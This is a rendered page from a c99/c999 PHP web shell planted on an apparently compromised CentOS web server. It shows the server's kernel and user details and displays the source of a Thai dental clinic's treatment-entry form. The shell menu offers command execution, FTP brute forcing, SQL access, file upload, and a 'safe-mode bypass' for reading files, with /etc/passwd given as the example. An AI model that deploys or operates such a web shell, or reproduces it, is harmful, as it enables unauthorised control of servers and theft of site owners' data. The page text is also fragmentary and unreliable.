!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/Dental/   drwxr-xr-x
Free 52.4 GB of 127.8 GB (41%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     InsertTeach.php (5.16 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
=100) {
//$No_in = "0$account" ;
//}
//else {
//if($account>=10) {
//$No_in = "000$account" ;
//}
//else {
//$No_in = "0000$account" ;
//}
//}
//$No_code = "$HN_no$No_in" ; // รหัสสมาชิกเช่น ip0001	
/////////////////// Check เลขที่ใบเสร็จ ///////////
if ($No_code =="")
{
$msg .="
  • กรุณาระบุ  เลขที่ใบเสร็จด้วยค่ะ";
$button ="";
$Flag = false;
}
//////////////     Check เลขที่ใบเสร็จ   /////////////////////////////////////
//echo "$No_code 
    ";
//$sql = "Select * From  account  Where  No_code='$No_code'";
//$result  = mysql_query($sql) or die("Error $result".mysql_error());
//$sum = mysql_num_rows($result);
//if ($sum>0)
//{
//$msg .="
  • รหัส $No_code ซ้ำ";
//$button ="";
//$Flag = false;
//}
////////////////////////
if ( ! CheckLenght( $No_code,9 ) )
	{
		$msg .= "
  • เลขที่ใบเสร็จต้องมีตั้งแต่ 9หลัก";
		$button = "";
		$Flag = false;
	}
//////////////////////// check จำนวน  ///////////////// 
if ($Mount=="")
{
$msg .="
  • กรุณาระบุ จำนวน";
$button ="";
$Flag = false;
}
///////////////////// check name
if ($Price  =="")
{
$msg .="
  • กรุณาระบุ ราคา";
$button ="";
$Flag = false;
}
//////////////////////////////////
	if( $Flag)
	 {
 	     InsertAccount($Person_code,$No_code,$HN_code,$Tooth_code,$Teach_code,$Teacher_code,$Code ,$Time_in,$Time_out,$Date,$Price ,$Mount,$Cost_total,$Percen,$Hostpital,$Roug);
    	  $msg.="
  • ระบบจัดเก็บข้อมูลเรียบร้อยแล้ว";
          echo"\n";
	}
	CloseDB();
?>


Inserting Treattment





    

    
  
    
    
    

    ::ฟอร์มการเพิ่มข้อมูล::
    		

    

    


    
          
     
             
    ระบบแจ้งการทำงาน
    		
          
    
          
     
             
    
                
     
                  
                
    
              
    		
          
    
          
     
             
    		
          
    
        
    
    		

    

    

    

    

    


\n";
       echo"Please Login ";
}
?>
    bool(false)

    • :: Command execute ::

    Enter:
     
    Select:
     

    :: Shadow's tricks :D ::

    Useful Commands
     
    Warning. Kernel may be alerted using higher levels
    Kernel Info:

    :: Preddy's tricks :D ::

    Php Safe-Mode Bypass (Read Files)

    File:

    eg: /etc/passwd
    Php Safe-Mode Bypass (List Directories):

    Dir:

    eg: /etc/

    :: Search ::
      - regexp 
    :: Upload ::
     
    [ Read-Only ]

    :: Make Dir ::
     
    [ Read-Only ]
    :: Make File ::
     
    [ Read-Only ]

    :: Go Dir ::
     
    :: Go File ::
     

    --[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--